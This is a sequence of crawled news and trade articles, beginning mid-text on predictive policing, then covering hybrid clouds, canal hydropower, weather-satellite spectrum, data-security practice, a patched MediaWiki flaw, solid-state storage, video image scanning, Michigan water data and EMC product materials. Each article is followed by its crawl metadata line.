Clausius agreed, but said mining social media will be more difficult as time goes on. Many people are locking down their social media accounts so that data isn’t as readily accessible, but she says law enforcement still must figure out how to tap deeper into the information that social networks can provide.
One might assume that criminals would be smart enough to vary where they spend their time, particularly if cops are homing in on new sources of information that may pinpoint the likelihood of a crime occurring in an area. But Colleen McCue, senior director of social science and quantitative methods for GeoEye, a geospatial services firm, said it’s unlikely.
McCue, author of Data Mining and Predictive Analysis: Intelligence Gathering and Crime Analysis, explained that humans are aware of a vast majority of their behaviors, but location preferences tend to be subtle and unconscious in many cases.
For example, at a grocery store, next to the bananas, you might see a display of Nilla Wafer cookies, which go well with the fruit. McCue described that type of product placement as a method of optimizing decision-making. Criminals have the same type of decision process that is largely unconscious.
“Even if they are aware of what they are doing, it is very difficult to bypass some of those unconscious decision processes,” McCue said. “It is very difficult to engage in truly random behavior, and it is that fact that makes the whole crime analyst thing work.”
Virtual gaming is another arena Clausius believes will be a gold mine for data in the next decade or two. From gambling sites to independent virtual identities to trade money for crime, Clausius thinks cyberspace is ripe for the picking when it comes to data to improve predictive policing efforts.
“I don’t think law enforcement and public safety have even tapped into that as far as a data source or intelligence,” she said. “There are all kinds of games
for all different purposes … and maybe on a federal level they are already gaming and in those worlds, but from a local law enforcement level, we are not in any of that.”
New data may drive the future of predictive policing, but technology won’t stand still. Paul Steinberg, CTO of Motorola Solutions, says the ways officers gather data and receive instruction will radically change in the next few decades. Steinberg said he envisions much more mobile technology use — far beyond the laptops and smartphones that cops carry today.
From RFID-based fabrics to advanced hands-free mobile platforms, Steinberg believes technology will become an extension of a person, rather than separate devices he or she carries. For example, Motorola is discussing how to embed display technology into an optical unit that can capture and relay information to a police officer.
It could be something similar to Google Goggles, but specifically designed for cops and emergency personnel. So when first responders arrive on a scene, their reality is augmented with technology that increases situational awareness.
“It is the kind of thing you are going to see a lot more of,” Steinberg said. “People are not going to want to carry the devices; they are going to want to wear them and have them be as unobtrusive as possible.”
Clausius cautioned that new technology needs to be deployed in ways that don’t compromise officer safety. Having been an officer herself for nine years, she said that the job is to respond to a situation and focus on street-level issues.
“We need to provide them the tools that make their job easier, but we also need to keep in mind it is a safety issue,” Clausius said. “If they are being thrown so much information that they are taking their eyes off the suspect or off the road, we might actually be causing more problems.”
One science fiction element not likely to be a part of predictive policing in the next 20 years is computer-based decision-making. While complex algorithms will be used to evaluate mountains of new data, both police and researchers believe advanced computers and artificial intelligence won’t be at a level where they’d feel comfortable trusting machines to make deployment decisions.
Douglass spotlighted WarGames — the 1983 film starring Matthew Broderick where a military computer confused reality with a simulation and almost annihilated the world with nuclear missiles — as a still-viable lesson for future generations.
“We have not been able to automate intuition into computers — they are a binary, two-dimensional look at things,” Douglass said. “The human element adds that quality of intuition that I don’t think is dispensable. I think [the data] is always going to need some human interpretation.”
Clausius and McCue agreed. Clausius said that despite the
likelihood of further artificial intelligence advancements, computers should remain a tool and the human element should always be present.
McCue added that from an operational public safety and national security perspective, she’d be troubled by the automation of police resources and deployment decisions.
“I don’t see in my lifetime getting to the point where we can develop a machine-learning algorithm that would be able to select the tactics and strategy that you would use to address a particular scenario,” McCue said.
Fritz pointed out that while computers have been shown to make independent decisions, they’re usually governed by a defined set of rules. For example, in chess, a computer can make choices and anticipate moves based on those rules.
But in the criminal world, offenders don’t always adhere to a plan, necessitating the need for a human’s adaptive ability.
Scott concurred that humans need to be a part of the equation when it came to making predictive policing decisions based on data. But he felt it was inevitable that computers would at some point be used for low-level decision-making.
So did Hollywood, but he was confident that actual strategy would always be decided by humans.
“Computer assistance and artificial intelligence in the field is kind of becoming the information technology equivalent of replacing shovels with … bulldozers,” Hollywood said. “You have more power and ability to process larger amounts of data and do basic operations faster. At the same time … you still need somebody driving the bulldozer.” | <urn:uuid:f8cb2950-00eb-4722-9f8c-b246b807bdda> | CC-MAIN-2017-09 | http://www.govtech.com/featured/Behavioral-Data-and-the-Future-of-Predictive-Policing.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171163.39/warc/CC-MAIN-20170219104611-00302-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.951679 | 2,704 | 2.90625 | 3 |
Bridging Private and Public Clouds
Scaling IT means using tools and services on both sides of the cloud divide.A divide as real as any weather front separates private, wholly owned data centers from public, capacity-for-hire cloud providers. There is a role for IT in creating a bridge across this divide as virtualization of all types enables more efficient application development, virtual machine provisioning and business continuity. A bridged private/public cloud promises efficient workload relocation and an evolutionary path to more cost-effective IT operations. However, the challenges to building a bridge between private and public clouds are real. Aside from the emerging nature of cloud computing technology, IT managers must work with developers and business managers to ensure that development platforms, management controls and compliance issues are aligned between the private and public platforms in order to reap these benefits.
Why Build a Bridge? Application development was among the first beneficiaries of x86 server virtualization and set the stage for running infrastructure on site and in a hosted environment. Setting up test and development environments composed of virtual machines that could be rapidly provisioned and de-provisioned on shared resources was also a driver for using public cloud services including AWS (Amazon Web Services). Corporate users can use architectural guides today to move workloads from private to public, enterprise-class cloud providers. For example, VMware partners with public cloud infrastructure providers including Bluelock, CSC, Terremark and others using its VMware vCloud Data Center Services. In this case, the private/public cloud bridge connects infrastructure (usually processing, storage and networks) or platform (which usually adds to this the operating system and database) so that applications can be built using familiar tools. These cloud "as a service" offerings are referred to as IAAS (infrastructure as a service) and PAAS (platform as a service). One of the earliest thoughts behind creating a bridge between a private and public cloud IAAS or PAAS implementation was to support essential computing workloads without buying all the underlying hardware infrastructure. And an early example of this was "cloud bursting," or the on-demand creation of IT systems to support peak demands. It turns out that workloads are more likely to expand and contract within either the private or the public cloud as opposed to moving across the boundary on a bridge. However, this could be an effective use case in the near future if ODCA virtual machine portability guidelines are broadly adopted. For now, this functionality usually needs to be built into the application. BC/DR (business continuity and disaster recovery) plans don't have much chance of working when confined to a single, physical data center. These essential business operations are more likely to succeed if there is a bridge to an physically separated facility. While there are a host of concerns when executing a BC/DR move across data centers, this could be a use case for bridging a private and public cloud. Bridging to support peak demand or BC/DR also means taking into account data security including authorized access. In addition to ensuring workload portability, the Open Data Center Alliance usage models go into detail when describing how cloud providers should be able to assure secure access while also demonstrating how identity, applications and data use are monitored to meet compliance reporting guidelines. Challenges
These are still early days for bridging private and public clouds, which means we are uncovering potholes, both intentional and accidental. Our work at eWEEK Labs has shown that synchronizing workloads on private and public cloud platforms can be tricky. For example, an application workload created as a VMware virtual machine, which results in a .VMDK (Virtual Machine Disk Format), must be converted to an AMI (Amazon Machine Instance) in order to run on Amazon's EC2 (Elastic Compute Cloud). It's possible to convert most workloads from one format to another, but this must be taken into account up front in order to minimize problems. This points to the importance of separating the application from the underlying image in order to increase deployment flexibility. There is a fair amount of trepidation about the suitability of a public cloud infrastructure for running workloads that handle regulated data. While the feelings of unease are warranted in the short term, regulatory concerns will likely be overcome in the medium term. IT managers should ask questions that show that a public cloud provider can meet the same level of compliance as that of a private cloud. Once these questions have been resolved, then a private/public bridge project can be assessed on the technical and cost merits. The disquiet about bridging private and pubic cloud infrastructure likely also arises from the newness of cloud computing. Amazon's EC2 exited beta in 2008. IAAS and PAAS for the enterprise are emerging technologies. The fact that NIST and the ODCA have just in the last month released drafts and first versions of their guidelines tells us this is an area for early adopters, an area that is often foreign to enterprise IT managers. Even though the idea of using private and public cloud resources in concert is new territory, the technique has potential as fertile ground for organizations that are in the market for a IT competitive edge. | <urn:uuid:43e8ac3c-49b8-4155-a2da-1109a999980b> | CC-MAIN-2017-09 | http://www.eweek.com/c/a/Cloud-Computing/Bridging-Private-and-Public-Clouds-590165 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171807.25/warc/CC-MAIN-20170219104611-00002-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.943105 | 1,038 | 2.53125 | 3 |
Researchers in Colorado are investigating the potential for the state’s irrigation canals to be used as a source of renewable hydropower.
Engineering firm Applegate Group Inc. and Colorado State University have received a $50,000 grant from the Colorado Department of Agriculture to look into generating hydropower from the 3 million acres of irrigated land in the state. The grant is part of the Advancing Colorado's Renewable Energy Program to promote energy-related projects beneficial to Colorado's agriculture industry.
Hydropower is created by running water through a hydraulic turbine that spins and drives a generator shaft to create electricity. Most small hydro projects, also called micro-hydro, divert a portion of a river or creek’s flow, or are constructed on established channels, such as irrigation ditches.
Currently about 10 percent of U.S. electricity comes from hydropower, according to the Colorado Renewable Energy Society. Compared to other renewable energy sources, hydropower is known for being consistent and durable.
Recent technological advancements in small hydro — the development of hydroelectric power on a scale serving a small community — have made Colorado irrigation canals a likely possibility for hydro development, said Colorado State University professor Daniel Zimmerle, who received the grant.
“In the small hydro area, [Colorado has] a good chance of being a leader because we have a lot of state and local support for the idea,” Zimmerle said. “It helps to be in mountains.”
Zimmerle and researchers will study how efficient and plausible low-head hydropower, which uses river current and tidal flows to produce energy without the use of a dam, is in hundreds of statewide irrigation ditches with drops between five feet and 30 feet.
The costs and environmental impacts of constructing a dam make traditional hydroelectric projects difficult. However, small hydro costs are similar to other renewable energy sources, Zimmerle said.
In terms of wiring the hydro facility to be managed remotely and connected to the electric grid, all conversion inverters and communications equipment that have been used for other applications will be reapplied to small hydro, he said.
“Once you get those big rocks in place, there are actually quite a few questions about economic viability and how you implement these systems,” said Zimmerle. “That’s where we are going to go after this research project is over.”
Until recently, “tortuous” government permitting processes, along with the large initial cost of the systems, have been the biggest barriers to implementing hydro technology, said Zimmerle. Plus, water resources can be particularly troublesome in terms of water rights issues and flow rates, he added.
However, as barriers to renewable energy sources have been knocked down over the past decade, more opportunity for micro-hydro has also become available, he said, and legislators have been green energy promoters.
Small hydro technology may also prove to be a revenue source for irrigation companies, researchers said. | <urn:uuid:d88f1176-70af-4877-b72a-3ca819e5adc5> | CC-MAIN-2017-09 | http://www.govtech.com/technology/Colorado-Hydropower-Irrigation-Ditches-030111.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172077.66/warc/CC-MAIN-20170219104612-00178-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.958731 | 615 | 3.390625 | 3 |
The Obama administration’s plan to share weather satellite frequencies with commercial cellular carriers could severely degrade scientists’ ability to forecast hurricanes and monitor flooding, weather and spectrum, experts told Nextgov.
The Federal Communications Commission proposed reallocating spectrum used by weather satellites in the 1675-1710 MHz band for commercial use in its 2010 National Broadband plan, a shift widely opposed by weather organizations worldwide.
FCC and the National Telecommunications and Information Administration narrowed the portion of the weather spectrum up for grabs to the 1695-1710 MHz band and endorsed sharing that band with commercial users at an August 2012 spectrum planning meeting.
John Snow, professor of meteorology at the University of Oklahoma, said this plan could interfere with the reception of data from sounding instruments on Geostationary Operational Environmental Satellites that measure atmospheric temperatures, cloud cover, moisture and humidity.
The National Weather Service cranks the data from these instruments into numerical models on its supercomputers to develop forecasts, including those used this week to predict the path of Hurricane Sandy, Snow said.
Weather satellite instruments play a key role in assessing conditions over oceans -- where hurricanes form -- as forecasters do not have any other means of measuring key parameters, as they do over land, Snow said.
The Weather Service also uses instrument data from the European Metop weather satellites. In 2010, Michel Jarraud, secretary general of the World Meteorological Organization, told FCC that reallocation of weather satellite spectrum could degrade the ability of forecasters to track hurricanes.
GOES transmits raw sounding data at a frequency of 1696 MHz and European satellites use downlink frequencies in the 1701-1707 MHz band. Snow said he does not believe the technology exists today that would allow sharing of weather satellite spectrum with cellular carriers without causing interference to what he called “key sensing systems.”
The spectrum sharing plan also could imperil signals transmitted from the GOES satellite for the Emergency Managers Weather Information Network, which transmits data at 1692.7 MHz and can be received on simple, inexpensive antenna systems connected to a PC. This data stream includes daily weather forecasts, severe storm warnings, flash flood warnings and even iceberg reports.
FCC wants to determine if weather satellite data could be downloaded to a small number of satellite dishes protected from interference by commercial cellular towers, with the data then transmitted over the Internet. Snow pointed out this approach would work only up until the point that rain flooded basements containing Internet hardware.
The U.S. Geological Survey operates a national network of 3,072 stream gauges to monitor water levels and potential floods, with data downlinked at a frequency of 1694.5 MHz from the GOES satellite, or just below the frequency FCC and NTIA want to share with commercial carriers.
Bernie Skoch, a telecommunications and computer consultant said this is too close for comfort, as poorly designed receivers could interfere with the signals. Robert Mason, acting chief of surface water for the Geological Survey, said any interference from commercial carriers “could put us out of business.”
Heather Phillips, an NTIA spokeswoman, said in an email statement that NTIA “recognizes the critical role that weather satellites play in tracking and monitoring potentially life-threatening storms, such as Hurricane Sandy. We are continuing our work to protect the critical sites that operate in the 1695-1710 MHz band, which have been identified for reallocation."
That’s not enough, said Skoch. In an era of climate change, weather satellites are mission-critical systems that need more -- not less -- spectrum, he said. | <urn:uuid:e50acdfd-c71e-4514-9a62-56aadc20b1e3> | CC-MAIN-2017-09 | http://www.nextgov.com/mobile/2012/11/next-hurricane-sandy-might-come-without-warning/59249/?oref=ng-relatedstories | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171166.18/warc/CC-MAIN-20170219104611-00650-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.919811 | 741 | 2.515625 | 3 |
Electronic data resides in two basic areas:
- In bulk in some form of repository, such as a database or collections of individual files (called data at rest)
- In small quantities being transmitted over a network (called data on the wire)
Your data is vulnerable no matter where it resides. While most companies take security precautions, many of those precautions turn out to be insufficient to protect valuable corporate assets. The key lies in knowing where vulnerabilities exist and making appropriate risk-based decisions.
The ability to gather and share volumes of information was the primary reason behind the creation of the Internet, but such wide availability greatly magnifies the risk of that information being compromised. Attacks against large databases of critical information are on the rise, such as in the following recent cases:
- February, 2003: A hacker broke into the security system of a company that processes credit card transactions, giving the hacker access to the records of millions of Visa and MasterCard accounts.
- June, 2004: More than 145,000 blood donors were warned that they could be at risk for identity theft from a stolen university laptop containing their personal information.
- October, 2004: A hacker accessed names and social security numbers of about 1.4 million Californians after breaking into a University of California, Berkeley computer.
NOTE – Identity theft occurs when someone uses your personal information—such as your name, social security number, credit card number, or other identifying information—without your permission, frequently to commit fraud or other crimes.
Vulnerabilities of Data on the Wire
Data on the wire is vulnerable to some very focused attacks. Data can be intercepted (sniffed). ARP attacks can be used to sniff information in a switched environment. ARP attacks can also be used to initiate “man in the middle” attacks that can allow an attacker to intercept and potentially modify information in transit.
Sniffing refers to a technique for capturing network traffic. While sniffing can be accomplished on both routed and switched networks, it’s much easier in a routed environment:
- Layer 3 devices, such as routers, send information by broadcasting it to every destination on the network, and the destination handles the problem of parsing out the specific information that’s needed from the general broadcast.
- In a switched environment, switches send traffic only to its intended host (determined by the destination information in each individual packet).
Operating in a switched environment doesn’t totally alleviate the risk of sniffing, but it does mitigate that risk to a large degree.
Most networks today also utilize virtual LAN (VLAN) configurations to segment network traffic and further reduce the risk of sniffing. A VLAN is a switched network that’s logically segmented. VLANs are created to provide the segmentation services traditionally provided by routers in LAN configurations. VLANs address scalability, security, and network management. Routers in VLAN topologies provide broadcast filtering, security, address summarization, and traffic-flow management.
Just as switches isolate collision domains for attached hosts and only forward appropriate traffic out a particular port, VLANs provide complete isolation between VLANs. None of the switches within the defined group will bridge any frames—not even broadcast frames—between two VLANs. Thus, communication between VLANs is accomplished through routing, and the traditional security and filtering functions of the router can be used.
Segmentation can be organized in any manner: function, project team, application. This capability is especially useful for isolating network segments for security purposes. For example, you may place application servers on one VLAN and system administrators on another (management-level) VLAN, with access control lists to restrict administrative access to only that VLAN. This setup can be accomplished regardless of physical connections to the network or the fact that some users might be intermingled with other teams.
The Ethernet Address Resolution Protocol (ARP) enables systems to find the unique identifier (MAC address) of a destination machine. ARP attacks provide the means to either break or misuse the protocol, with the goal of redirecting traffic from its intended destination. In an ARP attack, the attacker can sniff, intercept, and even modify traffic on a compromised network segment.
The effectiveness of these attacks is limited in two ways:
- Data on the wire is generally available only in small pieces. It’s true that many systems and applications send login/password pairs in clear text (without any encryption). An attack may capture such small bits of data; it may even be possible over time to assemble enough useful information to make identity theft possible. However, the attacker must either be directly connected to the internal network, or have succeeded in compromising an internal system and installing some form of sniffer to gather information. For the effort to be worthwhile to the hacker, many small chunks would need to be captured and then filtered out of the massive volumes of traffic traversing most of today’s networks; and then the captured data would have to be reassembled into meaningful information. This is a tremendous task with a potentially very small payoff.
- Capturing data takes time. The longer the attacker is inside the network, the more likely he or she is to get caught. It’s easier to get information at the source, rather than trying to capture and decode thousands of network packets.
Vulnerabilities of Data at Rest
While sniffing data on the wire may yield a big reward, data at rest is the proverbial pot of gold. Most organizations maintain detailed databases of their personnel information, for example, making the large corporation a very tempting target. These databases regularly contain quantities of names, addresses, and even social security numbers for tax purposes. This is all the information that someone needs to steal your identity. Statistics show that identity theft attacks are increasing. More than thirty thousand victims reported ID theft in 2000; in 2003, the Federal Trade Commission received more than half a million complaints.
A major issue in protecting your data repository is the fact that there are so many avenues of attack. Attacks can be launched against the operating system, the database server application, the custom application interface, the client interface, and so on. Application attacks don’t have to be directed against the target application, either. Any attack providing system-level access to an attacker is a risk to your data.
Your system is also a potential target for a multitude of computer viruses, worms, and Trojans. Current reports put the number of these types of applications at more than 100,000. Many recent computer worms leave systems vulnerable by covertly installing a backdoor that enables the attacker to enter the system at will.
How Can We Protect Our Data?
How do we defend against so many possible attack vectors? The key is to focus on the data. The first step should be data-sensitivity analysis as part of an overall risk-assessment process. Data-sensitivity analysis begins by identifying an organization’s critical data and ways in which that data is used. Once the sensitivity of data has been classified, the organization can reach decisions about the necessary level of protection for that data. Your tendency may be to apply the greatest level of protection available, but that level may be neither necessary nor cost-effective. For example, you wouldn’t spend $100,000 on a firewall to protect an expected loss of only $5,000. You can get a better idea of how to apply countermeasures if you include a loss/impact analysis as part of the risk-assessment process.
A simple approach to data protection looks at the various layers of security that can be applied. Consider the following starting checklist:
- Do you need to encrypt the data repository?
- Do you need a hash of the transactions for integrity purposes?
- Should you digitally sign transactions?
- Make sure that database logging is enabled and properly configured.
- Harden the operating system.
- Disable unnecessary services and close ports.
- Change system defaults.
- Don’t use group or shared account passwords.
- Lock down file shares.
- Restrict access to only necessary personnel.
- Consider host-based firewalls and intrusion detection for critical servers.
- Maintain proper patch procedures.
- Use switches rather than routers or hubs as much as possible.
- Lock down unused router/switch ports.
- Consider MAC filters for critical systems.
- Establish logical subnets and VLANs.
- Set up access control lists (ACLs) for access routes.
- Use ingress/egress filters, anti-spoof rules.
- Determine appropriate location and functionality for network-based firewalls and intrusion detection.
- Use encrypted logins or SSL for web-based sessions.
Physical security for data:
- Establish input/output handling procedures.
- Use physical access logs for server rooms and network operations centers.
- Document tape-handling procedures, tape rotation, offsite storage.
- Consider an alternate data center.
- Archiving: Where does your data go to rest in peace?
- Data destruction: Degauss, erase/overwrite, physical destruction?
- How is data handled when equipment is sent out for repair, replacement, or end of life?
This is just a quick list of points to consider. Fortunately, folks much smarter than I am have developed a much more comprehensive approach.
Security standards and guidance are available, especially for organizations that are part of or do business with the U.S. government. Through the work of various organizations, the government has put together a program known as Certification & Accreditation (C&A). Standards have been and continue to be developed that provide guidance on the performance of risk assessments, development of security plans, and the application of security controls.
The Computer Security Division of the National Institute of Standards and Technology (NIST) has been assigned this important multi-part task:
- Improving federal information-systems security by raising awareness of IT risks, vulnerabilities, and protection requirements, particularly for new and emerging technologies.
- Researching, studying, and advising agencies of IT vulnerabilities and devising techniques for the cost-effective security and privacy of sensitive federal systems.
- Developing standards, metrics, tests, and validation programs.
- Developing guidance to increase secure IT planning, implementation, management, and operation.
The C&A process is explained and documented in NIST’s publications. NIST’s guidelines provide an excellent framework for selecting, specifying, employing, and evaluating the security controls in information systems.
Data is under constant attack from a growing number of sources. It’s vital that you know what data you have, how sensitive that data is, how critical it is to your corporate mission, and the risks it faces. Perform a risk assessment, and, once the threat level has been determined, develop an appropriate plan to protect that data with multiple layers of security. Only by being aware of your valuable assets can you properly monitor and protect them. | <urn:uuid:87302972-db7b-455a-ac92-644940269802> | CC-MAIN-2017-09 | https://www.helpnetsecurity.com/2004/12/20/why-your-data-is-at-risk/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171166.18/warc/CC-MAIN-20170219104611-00650-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.910389 | 2,268 | 3.390625 | 3 |
The possibility of Wikipedia being taken over by attackers was just foiled by quick action on the part of Wikimedia Foundation, the nonprofit that operates Wikipedia, with the help of Check Point, the security firm that discovered the critical security hole in its code.
"It is conceivable that someone who discovered this vulnerability could have executed code that may have made it possible to access user data," says Wikimedia Foundation spokesman Jay Walsh. But it was Check Point researchers who discovered this vulnerability first in the MediaWiki project Web platform, which is open-source code used to create and maintain wiki websites.
Check Point says what its researchers uncovered was a remote-code execution flaw in MediaWiki 1.8 onwards where the attacker could potentially gain complete control of the vulnerable web server. A patch "was applied to the software within 45 minutes of discovery," says Walsh. WikiMedia has also released the patch today so others can apply it to the open-source code as well.
+ ALSO ON NETWORK WORLD Five tips from a CIO on dealing with massive DDoS attacks | Three security start-ups you should keep an eye on +
This is only the third time since 2006 that a remote-code execution flaw had been identified in MediaWiki open-source code. If an attacker had discovered it first, then it would have been a "zero-day" vulnerability without a patch, says Patrick Wheeler, head of threat prevention product marketing at Check Point.
Check Point says if the vulnerability hadn't been discovered and fixed, an attacker could have been able to control the Wikipedia.org web server or any other wiki' site running on MediaWiki, and potentially inject and serve malware-infecting code to users visiting those sites.
This would have been a disaster to the millions of visitors to the site each month, and a blow to the respected open-source project that has helped foster the popular online Wikipedia encyclopedia.
Charles Henderson, director of application security services in Trustwave's SpiderLabs research division, says it's not that vulnerabilities are "necessarily better or worse" in open source as compared with closed source, proprietary code. The point is that open source code has become so widely used, including by business, any serious security issues in it that crop up can't be ignored.
Some open-source projects do a good job of managing security updates, says Henderson, while others seem more lax. But the openness of how code is developed and if necessary, patched, means that attackers can monitor open source development fairly easily, he says.
Sonatype CEO Wayne Jackson says the security of open-source code is getting more attention from those in the federal government, for example, who want to know more about how it gets developed. Jackson says there have been a string of security incidents associated with identified open-source vulnerabilities, such as last summer when a vulnerability in the Apache Struts web application framework was sold as an automated attack script in Chinese circles online. The Struts vulnerability was also tied to a cyber-intrusion into a Chicago-based trading exchange around that time, Jackson adds.
It's not unusual to find commercial software of one sort or another integrating open source. Jackson says one example is Sydney, Australia-based firm Atlassian which last summer publicly identified the Struts critical vulnerability in its software. He pointed out that Cisco also issued a security advisory last October related to Apache Struts remote-code execution vulnerability in its products.
It's often simple to identify sites built on open-source code such as Struts through a Google search, Jackson says.
Open-source code represents the modernization of software development, based on the idea of a "meritocracy" of achievement by software developers contributing into code they all share, Jackson says. But the downside is that "the ecosystem has treated open source like this huge sugar store, living off the sugar high of productivity."
One basic question about open-source is whether the organizations making use of it are even aware of it. "It's a fundamental problem," says Jackson. Sometimes it seems like the "bad guys are way more efficient than the good guys" in keeping track of open-source developments and usage.
Ellen Messmer is senior editor at Network World, an IDG website, where she covers news and technology trends related to information security. Twitter: MessmerE. E-mail: email@example.com
Read more about wide area network in Network World's Wide Area Network section. | <urn:uuid:cdfd5726-ee3b-428a-95c6-3ed66b04859a> | CC-MAIN-2017-09 | http://www.computerworld.com.au/article/537051/wikipedia_dodges_critical_vulnerability_could_let_attackers_take_over/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171629.84/warc/CC-MAIN-20170219104611-00174-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.952552 | 905 | 2.625 | 3 |
SSS is a general term that is more applicable because memory-based storage can come in a variety of configurations. SSD is a very specific term that should be limited to memory-based storage that happens to be in a hard drive form factor. The advantage of SSD, of course, is that it, for the most part, can be installed in anything that formerly accepted a hard drive. If you want to upgrade the hard drive on your laptop or server, you can pull out the hard drive and replace it with an SSD.
SSD technology is also the path that many storage systems manufacturers have chosen to quickly deliver memory-based storage to their customers. They can use their existing storage shelves that used to hold hard drives and now place SSD into them. There are issues with integrating SSD into legacy architectures as we detail in our article "SSD in Legacy Storage Systems," which include that the shelf or the controller architecture may not be able to sustain the performance capabilities of a whole shelf full of SSD. In essence memory-based storage acts as a bottleneck exposer.
This performance concern has lead to the growth of a wide range of options in the SSS market. There are PCIe-based SSS devices. They eliminate many of the bottleneck variables by removing the latency caused by the storage network. There are challenges sharing PCIe SSS across multiple servers. which applications like clustering and virtualization require.
Another option is to use SSS appliance-based systems that put memory-based storage into an appliance and make it available like any other block device attached to the storage network via fibre or 10-Gbps Ethernet. These systems often don't use SSD form factor, but instead use memory modules or custom boards so that greater density can be achieved. Shared SSS appliances of course have to deal with the storage network as well as developing their own internal switching architectures so that packaging of the appliance itself does not become an inhibitor to performance.
As we will discuss in our upcoming webcast "Understanding SSD Performance," there is more to performance than how fast the devices are. How SSS is packaged will be one of the key factors in determining performance. We have made the device, because it is memory, so fast that it now exposes all the other weaknesses in the performance chain and it is up to suppliers to develop technology that removes those bottlenecks.
Follow Storage Switzerland on Twitter | <urn:uuid:027fc63b-a2fc-4b46-99bd-1070be7ddfcb> | CC-MAIN-2017-09 | http://www.networkcomputing.com/storage/solid-state-disk-or-solid-state-storage/300506920?piddl_msgorder=thrd | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174135.70/warc/CC-MAIN-20170219104614-00050-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.962884 | 480 | 2.890625 | 3 |
Image scanning techniques
Interlaced scanning and progressive scanning are the two image scanning techniques available today for reading and displaying information produced by image sensors. Interlaced scanning is used mainly in CCDs. Progressive scanning is used in either CCD or CMOS sensors. Network cameras can make use of either scanning technique. (Analog cameras, however, can only make use of the interlaced scanning technique for transferring images over a coaxial cable and for displaying them on analog monitors.)
When an interlaced image from a CCD is produced, two fields of lines are generated: a field displaying the odd lines, and a second field displaying the even lines. However, to create the odd field, information from both the odd and even lines on a CCD sensor is combined. The same goes for the even field, where information from both the even and odd lines is combined to form an image on every other line.
When transmitting an interlaced image, only half the number of lines (alternating between odd and even lines) of an image is sent at a time, which reduces the use of bandwidth by half. The monitor, for example, a traditional TV, must also use the interlaced technique. First the odd lines and then the even lines of an image are displayed and then refreshed alternately at 25 (PAL) or 30 (NTSC) frames per second so that the human visual system interprets them as complete images. All analog video formats and some modern HDTV formats are interlaced. Although the interlacing technique creates artifacts or distortions as a result of ‘missing’ data, they are not very noticeable on an interlaced monitor.
However, when interlaced video is shown on progressive scan monitors such as computer monitors, which scan lines of an image consecutively, the artifacts become noticeable. The artifacts, which can be seen as “tearing”, are caused by the slight delay between odd and even line refreshes as only half the lines keep up with a moving image while the other half waits to be refreshed. It is especially noticeable when the video is stopped and a freeze frame of the video is analyzed.
With a progressive scan image sensor, values are obtained for each pixel on the sensor and each line of image data is scanned sequentially, producing a full frame image. In other words, captured images are not split into separate fields as with interlaced scanning. With progressive scan, an entire image frame is sent over a network and when displayed on a progressive scan computer monitor, each line of an image is put on the screen one at a time in perfect order. Moving objects are, therefore, better presented on computer screens using the progressive scan technique. In a video surveillance application, it can be critical in viewing details of a moving subject (e.g., a person running away). Most Axis network cameras use the progressive scan technique.
- At left: a full-sized JPEG image (704x576 pixels) from an analog camera using interlaced scanning.
- At right: a full-sized JPEG image (640x480 pixels) from an Axis network camera using progressive scan technology.
Both cameras used the same type of lens and the speed of the car was the same at 20 km/h (15 mph). The background is clear in both images. However, the driver is clearly visible only in the image using progressive scan technology.
Next topic: Image processing | <urn:uuid:be51f85a-6972-4698-a5a0-7343757f6a00> | CC-MAIN-2017-09 | https://www.axis.com/us/en/learning/web-articles/technical-guide-to-network-video/progressive-scan | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170404.1/warc/CC-MAIN-20170219104610-00470-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.927898 | 703 | 3.515625 | 4 |
The Department of Environmental Quality, in cooperation with the Department of Natural Resources and Department of Information Technology, Tuesday announced the availability of the Michigan Surface Water Information Management (MiSWIM
The MiSWIM system is a new, state-of-the-art Internet mapping application designed to provide the public easy access to water quality (biological, chemical, and physical) data and other information that has been obtained for Michigan's rivers, lakes and streams. Types of water quality information available to MiSWIM system users include: water and sediment chemistry, fish contaminants, E. coli bacteria, fish and aquatic macroinvertebrate communities, river flow, fish stocking, lake bathymetry, river valley segments, industrial and municipal wastewater discharge sites, septage land disposal sites, coldwater and natural river classifications, nonpoint source program grants, land use classifications, soil types, and aerial photographs.
"The MiSWIM system will allow the public and water resource managers to obtain water quality data and information for Michigan's rivers, streams, and lakes more easily and more efficiently," said DEQ Director Steven E. Chester. "Better access to this information through the MiSWIM system will improve water quality decision making at all levels of government."
"MiSWIM will provide a great tool for natural resource managers and citizens interested in natural resource issues to see how a water resource has been managed," DNR Director Rebecca Humphries said. "It will also aid recreational enthusiasts and anglers interested in different bodies of water by showing them a wide array of information regarding a lake, stream, or river." | <urn:uuid:c0b830c1-6026-4d97-af63-1ca20526847f> | CC-MAIN-2017-09 | http://www.govtech.com/geospatial/102478739.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170696.61/warc/CC-MAIN-20170219104610-00646-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.907695 | 325 | 2.90625 | 3 |
Material & Resource Use
PRODUCT MATERIAL CONTENT
Information technology (IT) devices contain substances that are essential to the functionality and safe use of the product, but some of them can adversely impact ecological and human health when not properly managed. To protect people and the environment, EMC takes a proactive approach to minimizing the use of these substances in our products by researching and, where feasible, substituting alternative materials. We also take measures to prevent these substances from entering the natural ecosystem. To learn more, visit Product End-of-Life.
DESIGN FOR ENVIRONMENT
The EMC® Design for Environment (DfE) program incorporates environmental considerations throughout product design. EMC engineers take what we have learned about the environmental impact of existing product designs and use that knowledge to implement best practices for ongoing design. To learn more, visit Efficient Products.
